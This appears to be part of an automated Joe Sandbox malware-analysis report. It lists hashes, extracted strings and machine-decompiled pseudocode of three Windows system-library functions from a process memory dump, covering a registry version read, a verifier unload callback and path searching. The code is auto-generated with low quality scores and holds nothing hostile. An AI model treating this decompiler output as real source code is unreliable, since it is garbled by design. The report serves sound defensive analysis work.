API String ID: 0-931879808
Opcode ID: 2ecee3fadd8fcaeddbdf42ed298b2b91b3e62db0e18a43b0aab74daf133edfec
Instruction ID: 08016f9c8dfbb8745bf4c1593059b81d66fc26538871bf6bc62d8104c0909887
Opcode Fuzzy Hash: 2ecee3fadd8fcaeddbdf42ed298b2b91b3e62db0e18a43b0aab74daf133edfec
Instruction Fuzzy Hash: F331F679A40B04EFF7908B58DCC5FAA7BADEF41754F010159E402B7180DBB4ED858B90

Uniqueness

Uniqueness Score: -1.00%

Function 341B1190 Relevance: 3.8, Strings: 3, Instructions: 97
COMMON

Download Yara Rule

C-Code - Quality: 62%

			E341B1190(void* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				signed int _v8;
				char _v12;
				char _v20;
				char _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				char* _v44;
				intOrPtr _v48;
				char _v52;
				signed int _t38;
				signed int _t39;
				void* _t55;
				void* _t61;
				void* _t62;
				signed int _t63;
				void* _t65;
				signed int _t70;

				_t55 = __edx;
				E341B5050(__ecx,  &_v20, __ecx);
				_v52 = 0x18;
				_v44 =  &_v20;
				_v48 = 0;
				_push( &_v52);
				_push(0x20019);
				_v40 = 0x40;
				_push( &_v12);
				_v36 = 0;
				_v32 = 0;
				_t62 = L341B2AB0();
				if(_t62 < 0) {
					L9:
					return _t62;
				}
				_t38 = _a8;
				_t63 = 2;
				_t39 = _t38 * _t63;
				_t70 = _t38 * _t63 >> 0x20;
				if(_t70 < 0 || _t70 <= 0 && _t39 <= 0xffffffff) {
					_v8 = _t39;
					_push( &_v8);
					_t61 = 0xc;
					_t58 = _t39;
					if(E341A457E(_t39, _t61) < 0) {
						goto L13;
					}
					_t65 = E34185D90(_t58,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
					if(_t65 == 0) {
						_t62 = 0xc0000017;
					} else {
						E341B5050(_t58,  &_v28, _t55);
						_push( &_a8);
						_push(_v8);
						_push(_t65);
						_push(_t63);
						_push( &_v28);
						_push(_v12);
						_t62 = L341B2B00();
						if(_t62 >= 0) {
							_t28 = _t65 + 0xc; // 0xc
							L341B88C0(_a4, _t28,  *((intOrPtr*)(_t65 + 8)));
						}
						L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t65);
					}
					_push(_v12);
					E341B2A80();
					goto L9;
				} else {
					L13:
					_push(_v12);
					E341B2A80();
					return 0xc0000095;
				}
			}

0x341b119f
0x341b11a2
0x341b11aa
0x341b11b1
0x341b11b9
0x341b11bc
0x341b11bd
0x341b11c5
0x341b11cc
0x341b11cd
0x341b11d0
0x341b11d8
0x341b11dc
0x341b126d
0x00000000
0x341b126d
0x341b11e2
0x341b11e7
0x341b11e8
0x341b11ea
0x341b11ec
0x341b1200
0x341b1203
0x341b1206
0x341b1207
0x341b1210
0x00000000
0x00000000
0x341b1229
0x341b122d
0x341b128a
0x341b122f
0x341b1234
0x341b123c
0x341b123d
0x341b1243
0x341b1244
0x341b1245
0x341b1246
0x341b124e
0x341b1252
0x341b1279
0x341b1280
0x341b1285
0x341b1260
0x341b1260
0x341b1265
0x341b1268
0x00000000
0x341e9a99
0x341e9a99
0x341e9a99
0x341e9a9c
0x00000000
0x341e9aa1

Strings

BuildLabEx, xrefs: 341B122F
@, xrefs: 341B11C5
\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 341B119B

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: @$BuildLabEx$\Registry\Machine\SOFTWARE\Microsoft\Windows NT\CurrentVersion
API String ID: 0-3051831665
Opcode ID: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction ID: 5a2de217c10f703e9d196eea23fd0d83efc9957871210f70bf0ae9f794581850
Opcode Fuzzy Hash: 407c755b68f4ec02dd6d9c758742cc6edbdac8ff7d311d90ea503818e906d973
Instruction Fuzzy Hash: 0D31B075900A09FFEF21CBA4CC84EAEBBBEEF84750F114065F945A7260D730DA059B90

Uniqueness

Uniqueness Score: -1.00%

Function 341F85AA Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 47
COMMON

Download Yara Rule

C-Code - Quality: 17%

			E341F85AA(intOrPtr* __ecx) {
				intOrPtr _t9;
				intOrPtr* _t17;
				intOrPtr* _t22;
				intOrPtr* _t23;

				_t9 =  *[fs:0x30];
				_t23 = __ecx;
				if(( *(_t9 + 0x68) & 0x00000100) == 0 ||  *0x34269231 == 0) {
					return _t9;
				} else {
					E3417FED0(0x34265220);
					if(E341F9174( *((intOrPtr*)(_t23 + 0x18))) == 0) {
						_t20 = _t23;
						if(E341F8E06(_t23) < 0) {
							L9:
							_push(0x34265220);
							return E3417E740(_t20);
						}
						_t22 =  *0x34265240; // 0x0
						while(_t22 != 0x34265240) {
							_t17 =  *((intOrPtr*)(_t22 + 0x1c));
							_t22 =  *_t22;
							if(_t17 != 0) {
								_t20 = _t17;
								 *0x342691e0( *((intOrPtr*)(_t23 + 0x30)),  *((intOrPtr*)(_t23 + 0x18)),  *((intOrPtr*)(_t23 + 0x20)), _t23);
								 *_t17();
							}
						}
						goto L9;
					}
					L3416B910("AVRF: AVrfDllUnloadNotification called for a provider (%p) \n", _t23);
					_pop(_t20);
					asm("int3");
					goto L9;
				}
			}

0x341f85aa
0x341f85ba
0x341f85bc
0x341f8632
0x341f85c7
0x341f85cc
0x341f85db
0x341f85ed
0x341f85f6
0x341f8625
0x341f8625
0x00000000
0x341f862a
0x341f85f8
0x341f861d
0x341f8600
0x341f8603
0x341f8607
0x341f860d
0x341f8615
0x341f861b
0x341f861b
0x341f8607
0x00000000
0x341f861d
0x341f85e3
0x341f85e9
0x341f85ea
0x00000000
0x341f85ea

Strings

AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 341F85DE

Memory Dump Source

Source File: 00000001.00000002.1275559957.0000000034140000.00000040.00001000.00020000.00000000.sdmp, Offset: 34140000, based on PE: true

Associated: 00000001.00000002.1275559957.0000000034269000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000001.00000002.1275559957.000000003426D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_34140000_ekstre.jbxd

Similarity

API ID:
String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
API String ID: 0-702105204
Opcode ID: 409e33b843ec9307ec572d4d2580fc617da88ef27dcbe0b981f40c009c0ba632
Instruction ID: 0e7c422477cd3833fd4bc6df17194e6bbb8c37ff43b7611c4c920fd25cf12370
Opcode Fuzzy Hash: 409e33b843ec9307ec572d4d2580fc617da88ef27dcbe0b981f40c009c0ba632
Instruction Fuzzy Hash: D401F735200E00DFEB205E15DCC4A567B66EF40374F400AACE40227452CFF6A8E3CE94

Uniqueness

Uniqueness Score: -1.00%

Function 341851C0 Relevance: 3.2, Strings: 2, Instructions: 658
COMMONCrypto

Download Yara Rule

C-Code - Quality: 76%

			E341851C0(signed int _a4, signed short _a8, signed int _a12, signed short _a16, intOrPtr _a20, intOrPtr* _a24, signed short _a28, signed int _a32, signed int* _a36) {
				signed int _v8;
				char _v532;
				void* _v568;
				signed int _v616;
				intOrPtr _v632;
				signed int _v660;
				void* _v664;
				intOrPtr _v668;
				intOrPtr _v672;
				signed int _v676;
				void* _v680;
				signed int _v692;
				signed int _v696;
				signed short _v700;
				signed int _v704;
				intOrPtr _v708;
				signed int _v712;
				signed short _v716;
				signed int _v720;
				signed int _v724;
				intOrPtr _v728;
				signed int _v732;
				signed int* _v736;
				signed int _v740;
				signed short _v744;
				void* _v748;
				signed int _v752;
				signed short _v756;
				signed short _v760;
				signed int _v764;
				void* _v768;
				void* _v772;
				void* _v776;
				void* _v780;
				void* _v782;
				void* _v784;
				void* _v788;
				void* _v792;
				void* _v796;
				void* _v798;
				void* _v800;
				void* _v802;
				void* _v804;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t223;
				signed short _t224;
				signed short* _t226;
				signed short _t229;
				unsigned int _t233;
				signed int _t237;
				signed int _t240;
				signed short _t244;
				signed short _t250;
				signed short _t255;
				signed short _t257;
				signed short _t261;
				signed short _t270;
				signed int _t271;
				signed short _t272;
				signed int _t273;
				unsigned int _t274;
				signed short* _t276;
				signed int _t280;
				unsigned int _t281;
				signed int _t299;
				intOrPtr _t301;
				void* _t305;
				signed short* _t313;
				signed int _t315;
				intOrPtr _t317;
				intOrPtr _t322;
				signed int _t330;
				intOrPtr* _t332;
				void* _t333;
				intOrPtr _t336;
				signed int _t337;
				intOrPtr _t338;
				signed short* _t339;
				signed short _t340;
				signed int _t343;
				signed short _t344;
				signed short _t346;
				short* _t347;
				signed int _t360;
				signed int _t361;
				signed int _t362;
				signed int _t367;
				signed short _t369;
				signed int _t370;
				signed int _t372;
				signed short _t376;
				signed short _t377;
				signed int _t386;
				signed int _t396;
				signed short* _t398;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t408;
				signed int _t410;
				void* _t411;
				signed int _t412;
				intOrPtr _t413;
				signed short _t418;
				void* _t420;
				signed short _t421;
				signed short _t422;
				short* _t423;
				intOrPtr _t424;
				void* _t425;
				void* _t426;
				signed int _t427;
				signed int _t429;

				_t429 = (_t427 & 0xfffffff8) - 0x2fc;
				_v8 =  *0x3426b370 ^ _t429;
				_t340 = _a8;
				_t389 = _a32;
				_t332 = _a24;
				_v756 = _a16;
				_v728 = _a20;
				_t223 = _a28;
				_v736 = _a36;
				_v744 = _t340;
				_v748 = _t332;
				_v716 = _t223;
				_v720 = _t389;
				_v740 = 0;
				_v732 = 0;
				_v764 = 0x2080000;
				_v760 =  &_v532;
				_t410 = _a12;
				_v712 = _t410;
				if(_t223 != 0) {
					 *_t223 = 0;
				}
				_t418 = _v756;
				if(_v736 != 0) {
					 *_v736 = 0;
					_t418 = _v756;
				}
				if(_t389 != 0) {
					 *_t389 = 0;
				}
				if(_t332 != 0) {
					_t389 = 0;
					 *_t332 = 0;
					 *((intOrPtr*)(_t332 + 4)) = 0;
				}
				if((_a4 & 0xfffffff8) != 0 || _t340 == 0 || _t410 == 0 || _v728 != 0 && _t332 != 0 && _t223 == 0) {
					_t224 = 0xc000000d;
					goto L48;
				} else {
					_t343 =  *_t410 & 0x0000ffff;
					_t226 =  *(_t410 + 4);
					if(_t343 < 2) {
						L15:
						if(_t343 < 4 ||  *_t226 == 0 || _t226[1] != 0x3a) {
							_t389 = 5;
						} else {
							if(_t343 < 6) {
								L127:
								_t389 = 3;
								L21:
								_v724 = _t389;
								if((_a4 & 0x00000002) == 0) {
									__eflags = _t389 - 5;
									if(_t389 == 5) {
										L53:
										__eflags = _a4 & 0x00000001;
										if((_a4 & 0x00000001) != 0) {
											_v696 = 0;
											_t421 = E34189870("true", _t410, _t418, _v728, _t332,  &_v696, 0, _v720, _v736);
											__eflags = _t421;
											if(_t421 >= 0) {
												_t344 = _v716;
												__eflags = _t344;
												if(_t344 != 0) {
													 *_t344 = _v696;
												}
												L50:
												_t421 = 0;
												L45:
												_t229 = _v760;
												if(_t229 != 0 && _t229 !=  &_v532) {
													L34183B90( &_v764);
												}
												_t224 = _t421;
												L48:
												_pop(_t411);
												_pop(_t420);
												_pop(_t333);
												return L341B4B50(_t224, _t333, _v8 ^ _t429, _t389, _t411, _t420);
											}
											__eflags = _t421 - 0xc0150008;
											if(_t421 != 0xc0150008) {
												goto L45;
											}
											_t418 = _v756;
										}
										__eflags = _t418;
										if(_t418 == 0) {
											L64:
											_t346 = _v744;
											_t233 =  *_t346 & 0x0000ffff;
											_t422 = _t233;
											_v704 = _t422;
											__eflags = _t233;
											if(_t233 == 0) {
												L77:
												_t389 = _v732 & 0x0000ffff;
												_v752 = _t389;
												_t237 = ( *_t410 & 0x0000ffff) + _t389 + _v740 + 2;
												_t336 = _v748;
												_v704 = _t237;
												__eflags = _t237 - 0xfffe;
												if(_t237 > 0xfffe) {
													_t421 = 0xc0000106;
													goto L45;
												}
												_t347 =  *((intOrPtr*)(_t346 + 4));
												_v748 = _t347;
												_t240 = _t347 + ((_t422 & 0x0000ffff) >> 1) * 2;
												_v712 = _t240;
												__eflags = _t347 - _t240;
												if(_t347 >= _t240) {
													L44:
													_t421 = 0xc000000f;
													goto L45;
												} else {
													goto L79;
												}
												while(1) {
													L79:
													_t423 = _t347;
													__eflags = _t347 - _t240;
													if(_t347 == _t240) {
														goto L82;
													} else {
														goto L80;
													}
													while(1) {
														L80:
														__eflags =  *_t423 - 0x3b;
														if( *_t423 == 0x3b) {
															goto L82;
														}
														_t423 = _t423 + 2;
														__eflags = _t423 - _t240;
														if(_t423 != _t240) {
															continue;
														}
														goto L82;
													}
													L82:
													_t244 = _t423 - _t347 & 0xfffe;
													_v744 = _t244;
													_v732 = _t244 & 0x0000ffff;
													__eflags = _t244;
													if(_t244 != 0) {
														_t360 =  *(_t423 - 2) & 0x0000ffff;
														__eflags = _t360 - 0x5c;
														if(_t360 != 0x5c) {
															__eflags = _t360 - 0x2f;
															if(_t360 != 0x2f) {
																_t244 = _t244 + 2;
																__eflags = _t244;
																_v744 = _t244;
															}
														}
													}
													_t389 = _t389 + ( *_t410 & 0x0000ffff) + (_t244 & 0x0000ffff);
													_t133 = _t389 + 2; // 0x4
													__eflags = ( *(_t429 + 0x12) & 0x0000ffff) - _t133;
													if(( *(_t429 + 0x12) & 0x0000ffff) < _t133) {
														__eflags = _v760 -  &_v532;
														if(_v760 !=  &_v532) {
															goto L163;
														}
														__eflags = _t389 - 0xfffc;
														if(_t389 > 0xfffc) {
															goto L163;
														}
														 *((short*)(_t429 + 0x16)) = _v704 & 0x0000ffff;
														_t250 = E34185D60(_v704 & 0x0000ffff);
														_v764 = _t250;
														__eflags = _t250;
														if(_t250 == 0) {
															L149:
															_t224 = 0xc0000017;
															goto L48;
														}
														goto L87;
													} else {
														L87:
														_v764 = 0;
														E3419DCDF( &_v764, _v748, _v732 & 0x0000ffff);
														_t255 = _v748;
														__eflags = _t255;
														if(_t255 != 0) {
															__eflags = _v732 - _t255;
															if(_v732 != _t255) {
																 *((short*)(_v760 + ((_v764 & 0x0000ffff) >> 1) * 2)) = 0x5c;
																_t144 =  &_v764;
																 *_t144 = _v764 + 2;
																__eflags =  *_t144;
															}
														}
														E3419DD46( &_v764, _t410);
														_t257 = _v756;
														__eflags = _t257;
														if(_t257 != 0) {
															E3419DD46( &_v764, _t257);
														}
														_t389 = _v764 & 0x0000ffff;
														_t150 = _t389 + 2; // 0x4
														__eflags = _t150 - ( *(_t429 + 0x12) & 0x0000ffff);
														if(__eflags > 0) {
															L163:
															_t421 = 0xc00000e5;
															goto L45;
														} else {
															 *((short*)(_v760 + (_t389 >> 1) * 2)) = 0;
															_t389 = 0;
															_t261 = E341A31BE( &_v764, 0, __eflags);
															__eflags = _t261;
															if(_t261 != 0) {
																_push(_v736);
																_push( &_v724);
																_push(0);
																_push(_v720);
																_push(_v716);
																_push(_t336);
																L106:
																_push(_v728);
																_push( &_v764);
																_t421 = E34189690();
																__eflags = _t421;
																if(_t421 >= 0) {
																	_t421 = 0;
																}
																goto L45;
															}
															_t240 = _v712;
															__eflags = _t423 - _t240;
															if(_t423 == _t240) {
																_t347 = _t423;
																_v748 = _t423;
															} else {
																_t156 = _t423 + 2; // 0x3a
																_t347 = _t156;
																_v748 = _t347;
															}
															__eflags = _t347 - _t240;
															if(_t347 >= _t240) {
																goto L44;
															} else {
																_t389 = _v752;
																continue;
															}
														}
													}
												}
											}
											_t424 =  *((intOrPtr*)(_t346 + 4));
											_t361 = _t424 + (_t233 >> 1) * 2;
											_t396 = _t361;
											__eflags = _t396 - _t424;
											if(_t396 <= _t424) {
												L70:
												_t270 = _t361 - _t396 >> 0x00000001 & 0x0000ffff;
												__eflags = _t270;
												if(_t270 != 0) {
													_t362 =  *(_t361 - 2) & 0x0000ffff;
													__eflags = _t362 - 0x5c;
													if(_t362 != 0x5c) {
														__eflags = _t362 - 0x2f;
														if(_t362 != 0x2f) {
															_t270 = _t270 + 1;
															__eflags = _t270;
														}
													}
												}
												_t271 = _t270 & 0x0000ffff;
												__eflags = _t271 - _v740;
												if(_t271 <= _v740) {
													_t271 = _v740;
												}
												_t346 = _v744;
												_t272 = _t271 + _t271;
												__eflags = _t272;
												_t422 = _v704;
												_v740 = _t272;
												goto L77;
											} else {
												_t273 = _t396 - 2;
												_t412 = _t361;
												goto L67;
												L67:
												__eflags =  *_t273 - 0x3b;
												if( *_t273 == 0x3b) {
													_t367 = _t412 - _t396 + 0x00000002 >> 0x00000001 & 0x0000ffff;
													_v752 = _t367;
													_t369 = _t367 - 0x00000001 & 0x0000ffff;
													__eflags = _t369;
													if(_t369 != 0) {
														_t337 =  *(_t412 - 2) & 0x0000ffff;
														__eflags = _t337 - 0x5c;
														if(_t337 != 0x5c) {
															__eflags = _t337 - 0x2f;
															if(_t337 != 0x2f) {
																_t369 = _v752 & 0x0000ffff;
															}
														}
													}
													_t370 = _t369 & 0x0000ffff;
													__eflags = _t370 - _v740;
													if(_t370 > _v740) {
														_v740 = _t370;
													}
													_t412 = _t273;
												}
												_t396 = _t396 - 2;
												_t273 = _t273 - 2;
												__eflags = _t396 - _t424;
												if(_t396 > _t424) {
													goto L67;
												} else {
													_v752 = _t412;
													_t410 = _v712;
													_t361 = _v752;
													goto L70;
												}
											}
										}
										_t274 =  *_t410 & 0x0000ffff;
										_v732 =  *_t418 & 0x0000ffff;
										__eflags = _t274;
										if(_t274 == 0) {
											goto L64;
										}
										_t398 =  *(_t410 + 4);
										_t276 =  &(_t398[_t274 >> 1]);
										__eflags = _t276 - _t398;
										if(_t276 > _t398) {
											while(1) {
												_t372 =  *(_t276 - 2) & 0x0000ffff;
												_t276 = _t276 - 2;
												__eflags = _t372 - 0x2e;
												if(_t372 == 0x2e) {
													_v756 = 0;
													_v732 = 0;
													goto L64;
												}
												__eflags = _t372 - 0x5c;
												if(_t372 == 0x5c) {
													goto L64;
												}
												__eflags = _t372 - 0x2f;
												if(_t372 == 0x2f) {
													goto L64;
												}
												__eflags = _t276 - _t398;
												if(_t276 > _t398) {
													continue;
												} else {
													goto L64;
												}
											}
										}
										goto L64;
									}
									L23:
									_t389 = _t410;
									if(L341858B0(2, _t410, 0,  &_v704, 0, 0,  &_v692) < 0) {
										L31:
										if(_t418 == 0) {
											goto L44;
										}
										_t280 =  *_t418 & 0x0000ffff;
										if(_t280 == 0) {
											goto L44;
										}
										_t389 = _t280;
										if((_a4 & 0x00000004) == 0) {
											_t281 =  *_t410 & 0x0000ffff;
											__eflags = _t281;
											if(_t281 == 0) {
												goto L34;
											}
											_t339 =  *(_t410 + 4);
											_t313 =  &(_t339[_t281 >> 1]);
											__eflags = _t313 - _t339;
											if(_t313 <= _t339) {
												goto L34;
											} else {
												goto L142;
											}
											while(1) {
												L142:
												_t386 =  *(_t313 - 2) & 0x0000ffff;
												_t313 = _t313 - 2;
												__eflags = _t386 - 0x5c;
												if(_t386 == 0x5c) {
													goto L34;
												}
												__eflags = _t386 - 0x2f;
												if(_t386 == 0x2f) {
													goto L34;
												}
												__eflags = _t386 - 0x2e;
												if(_t386 == 0x2e) {
													goto L44;
												}
												__eflags = _t313 - _t339;
												if(_t313 > _t339) {
													continue;
												}
												goto L34;
											}
										}
										L34:
										_t376 = ( *_t410 & 0x0000ffff) + 2 + _t389;
										if(_t376 > 0xfffe) {
											_t421 = 0xc0000106;
											goto L45;
										}
										if(_t376 > ( *(_t429 + 0x12) & 0x0000ffff)) {
											 *((short*)(_t429 + 0x16)) = _t376 & 0x0000ffff;
											_t377 = E34185D60(_t376 & 0x0000ffff);
											_v764 = _t377;
											__eflags = _t377;
											if(_t377 != 0) {
												goto L37;
											}
											goto L149;
										} else {
											_t377 = _v760;
											L37:
											L341B88C0(_t377,  *(_t410 + 4),  *_t410 & 0x0000ffff);
											L341B88C0(_v760 + (( *_t410 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t418 + 4)),  *_t418 & 0x0000ffff);
											_t429 = _t429 + 0x18;
											 *((short*)(_v760 + (( *_t418 & 0x0000ffff) + ( *_t410 & 0x0000ffff) >> 1) * 2)) = 0;
											_v764 =  *_t418 +  *_t410;
											_t389 =  &_v764;
											if(L341858B0(2,  &_v764, 0,  &_v712, 0, 0,  &_v676) < 0) {
												goto L44;
											}
											_t299 = _v676;
											_t413 = _v708;
											if(_t299 != 0) {
												_v712 = _t299;
												_v708 = _v672;
												_t301 = _v668;
											} else {
												_t301 = 0;
											}
											_v632 = _t301;
											 *((intOrPtr*)(_t429 + 0x98)) =  &_v712;
											_push(_t429 + 0xd0);
											 *(_t429 + 0x94) = 0x18;
											_push(_t429 + 0x94);
											 *((intOrPtr*)(_t429 + 0xa4)) = 0x40;
											 *(_t429 + 0xa8) = 0;
											_v616 = 0;
											_t305 = E341B2D80();
											_t338 = _v672;
											_t425 = _t305;
											if(_t338 != 0) {
												__eflags = 0xffffffffffffffff;
												asm("lock xadd [ebx], ecx");
												if(0xffffffffffffffff == 0) {
													_push( *((intOrPtr*)(_t338 + 4)));
													E341B2A80();
													L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t338);
												}
											}
											L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t413);
											if(_t425 >= 0 || _t425 == 0xc0000043 || _t425 == 0xc0000022) {
												_push(_v736);
												_push( &_v724);
												_push(0);
												_push(_v720);
												_push(_v716);
												_push(_v748);
												goto L106;
											} else {
												goto L44;
											}
										}
									}
									_v744 = _v700;
									_t315 = _v692;
									if(_t315 != 0) {
										_v704 = _t315;
										_v700 =  *(_t429 + 0x5c);
										_t317 =  *((intOrPtr*)(_t429 + 0x60));
									} else {
										_t317 = 0;
									}
									 *((intOrPtr*)(_t429 + 0x7c)) = _t317;
									 *((intOrPtr*)(_t429 + 0x80)) =  &_v704;
									_push(_t429 + 0xa8);
									_v660 = 0x18;
									_push( &_v660);
									 *((intOrPtr*)(_t429 + 0x8c)) = 0x40;
									 *(_t429 + 0x90) = 0;
									 *(_t429 + 0x94) = 0;
									_t426 = E341B2D80();
									_t322 =  *((intOrPtr*)(_t429 + 0x64));
									if(_t322 != 0) {
										__eflags = 0xffffffffffffffff;
										asm("lock xadd [eax], ecx");
										if(0xffffffffffffffff == 0) {
											_push( *((intOrPtr*)(_t322 + 4)));
											E341B2A80();
											L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t429 + 0x64)));
										}
									}
									L34183BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v744);
									if(_t426 >= 0 || _t426 == 0xc0000043 || _t426 == 0xc0000022) {
										_t421 = E34189690(_t410, _v728, _t332, _v716, _v720, 0,  &_v724, _v736);
										__eflags = _t421;
										if(_t421 < 0) {
											goto L45;
										}
										goto L50;
									} else {
										_t418 = _v756;
										goto L31;
									}
								}
								if(_t389 == 5) {
									__eflags = _t343 - 4;
									if(_t343 < 4) {
										goto L53;
									}
									__eflags =  *_t226 - 0x2e;
									if( *_t226 == 0x2e) {
										_t389 = _t226[1] & 0x0000ffff;
										__eflags = _t389 - 0x5c;
										if(_t389 == 0x5c) {
											L134:
											_v724 = 0;
											goto L23;
										}
										__eflags = _t389 - 0x2f;
										if(_t389 == 0x2f) {
											goto L134;
										}
										__eflags = _t389 - 0x2e;
										if(_t389 != 0x2e) {
											goto L53;
										}
										__eflags = _t343 - 6;
										if(_t343 < 6) {
											goto L53;
										}
										_t330 = _t226[2] & 0x0000ffff;
										__eflags = _t330 - 0x5c;
										if(_t330 == 0x5c) {
											goto L134;
										}
										__eflags = _t330 - 0x2f;
										if(_t330 != 0x2f) {
											goto L53;
										}
										goto L134;
									}
									goto L53;
								}
								goto L23;
							}
							_t400 = _t226[2] & 0x0000ffff;
							if(_t400 != 0x5c) {
								__eflags = _t400 - 0x2f;
								if(_t400 == 0x2f) {
									goto L20;
								}
								goto L127;
							}
							L20:
							_t389 = 2;
						}
						goto L21;
					}
					_t401 =  *_t226 & 0x0000ffff;
					if(_t401 == 0x5c || _t401 == 0x2f) {
						__eflags = _t343 - 4;
						if(_t343 < 4) {
							L125:
							_t389 = 4;
							goto L21;
						}
						_t402 = _t226[1] & 0x0000ffff;
						__eflags = _t402 - 0x5c;
						if(_t402 == 0x5c) {
							L116:
							__eflags = _t343 - 6;
							if(_t343 < 6) {
								L124:
								_t389 = 1;
								goto L21;
							}
							_t403 = _t226[2] & 0x0000ffff;
							__eflags = _t403 - 0x2e;
							if(_t403 == 0x2e) {
								L119:
								__eflags = _t343 - 8;
								if(_t343 < 8) {
									L123:
									__eflags = _t343 - 6;
									_t389 = ((0 | _t343 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
									goto L21;
								}
								_t408 = _t226[3] & 0x0000ffff;
								__eflags = _t408 - 0x5c;
								if(_t408 == 0x5c) {
									L122:
									_t389 = 6;
									goto L21;
								}
								__eflags = _t408 - 0x2f;
								if(_t408 != 0x2f) {
									goto L123;
								}
								goto L122;
							}
							__eflags = _t403 - 0x3f;
							if(_t403 != 0x3f) {
								goto L124;
							}
							goto L119;
						}
						__eflags = _t402 - 0x2f;
						if(_t402 != 0x2f) {
							goto L125;
						}
						goto L116;
					} else {
						goto L15;
					}
				}
			}

0x341851c8
0x341851d5
0x341851e2
0x341851e5
0x341851e8
0x341851ee
0x341851f5
0x341851f9
0x341851fc
0x34185207
0x3418520b
0x3418520f
0x34185213
0x34185217
0x3418521f
0x34185227
0x3418522f
0x34185233
0x34185236
0x3418523c
0x3418523e
0x3418523e
0x34185249
0x3418524d
0x34185843
0x34185849
0x34185849
0x34185255
0x34185852
0x34185852
0x3418525d
0x3418525f
0x34185261
0x34185263
0x34185263
0x3418526d
0x341d6c97
0x00000000
0x34185296
0x34185296
0x34185299
0x3418529f
0x341852b6
0x341852b9
0x34185801
0x341852d4
0x341852d7
0x341d6a9c
0x341d6a9c
0x341852ef
0x341852f3
0x341852f7
0x341d6ae5
0x341d6ae8
0x34185595
0x34185595
0x34185599
0x34185865
0x34185882
0x34185884
0x34185886
0x341d6c0a
0x341d6c0e
0x341d6c10
0x341d6c1a
0x341d6c1a
0x34185582
0x34185582
0x3418552d
0x3418552d
0x34185533
0x341d6c8d
0x341d6c8d
0x34185544
0x34185546
0x3418554d
0x3418554e
0x3418554f
0x3418555a
0x3418555a
0x3418588c
0x34185892
0x00000000
0x00000000
0x34185898
0x34185898
0x3418559f
0x341855a1
0x341855ec
0x341855ec
0x341855f0
0x341855f3
0x341855f5
0x341855f9
0x341855fc
0x34185669
0x34185671
0x3418567c
0x34185680
0x34185682
0x34185686
0x3418568a
0x3418568f
0x341d6c21
0x00000000
0x341d6c21
0x34185695
0x3418569d
0x341856a1
0x341856a4
0x341856a8
0x341856aa
0x34185528
0x34185528
0x00000000
0x00000000
0x00000000
0x00000000
0x341856b0
0x341856b0
0x341856b0
0x341856b2
0x341856b4
0x00000000
0x00000000
0x00000000
0x00000000
0x341856b6
0x341856b6
0x341856b6
0x341856ba
0x00000000
0x00000000
0x341856bc
0x341856bf
0x341856c1
0x00000000
0x00000000
0x00000000
0x341856c1
0x341856c3
0x341856ca
0x341856d0
0x341856d4
0x341856d8
0x341856db
0x341856dd
0x341856e1
0x341856e4
0x341856e6
0x341856e9
0x341856eb
0x341856eb
0x341856ee
0x341856ee
0x341856e9
0x341856e4
0x341856fa
0x34185701
0x34185704
0x34185706
0x341d6c32
0x341d6c36
0x00000000
0x00000000
0x341d6c38
0x341d6c3e
0x00000000
0x00000000
0x341d6c48
0x341d6c4d
0x341d6c52
0x341d6c56
0x341d6c58
0x341d6ba3
0x341d6ba3
0x00000000
0x341d6ba3
0x00000000
0x3418570c
0x3418570c
0x34185716
0x34185723
0x34185728
0x3418572c
0x3418572f
0x34185731
0x34185736
0x34185748
0x3418574c
0x3418574c
0x3418574c
0x3418574c
0x34185736
0x34185758
0x3418575d
0x34185761
0x34185763
0x341d6c69
0x341d6c69
0x34185769
0x34185773
0x34185776
0x34185778
0x341d6c7e
0x341d6c7e
0x00000000
0x3418577e
0x34185786
0x3418578a
0x34185790
0x34185795
0x34185797
0x3418580b
0x34185817
0x34185818
0x3418581a
0x3418581e
0x3418581f
0x34185820
0x34185820
0x34185828
0x3418582e
0x34185830
0x34185832
0x34185838
0x34185838
0x00000000
0x34185832
0x34185799
0x3418579d
0x3418579f
0x341d6c73
0x341d6c75
0x341857a5
0x341857a5
0x341857a5
0x341857a8
0x341857a8
0x341857ac
0x341857ae
0x00000000
0x341857b4
0x341857b4
0x00000000
0x341857b4
0x341857ae
0x34185778
0x34185706
0x341856b0
0x341855fe
0x34185603
0x34185606
0x34185608
0x3418560a
0x34185631
0x34185637
0x3418563a
0x3418563d
0x3418563f
0x34185643
0x34185646
0x34185648
0x3418564b
0x3418564d
0x3418564d
0x3418564d
0x3418564b
0x34185646
0x3418564e
0x34185651
0x34185655
0x34185657
0x34185657
0x3418565b
0x3418565f
0x3418565f
0x34185661
0x34185665
0x00000000
0x3418560c
0x3418560c
0x3418560f
0x3418560f
0x34185611
0x34185611
0x34185615
0x341857c6
0x341857c9
0x341857ce
0x341857d1
0x341857d4
0x341857d6
0x341857da
0x341857dd
0x341857df
0x341857e2
0x341857e8
0x341857e8
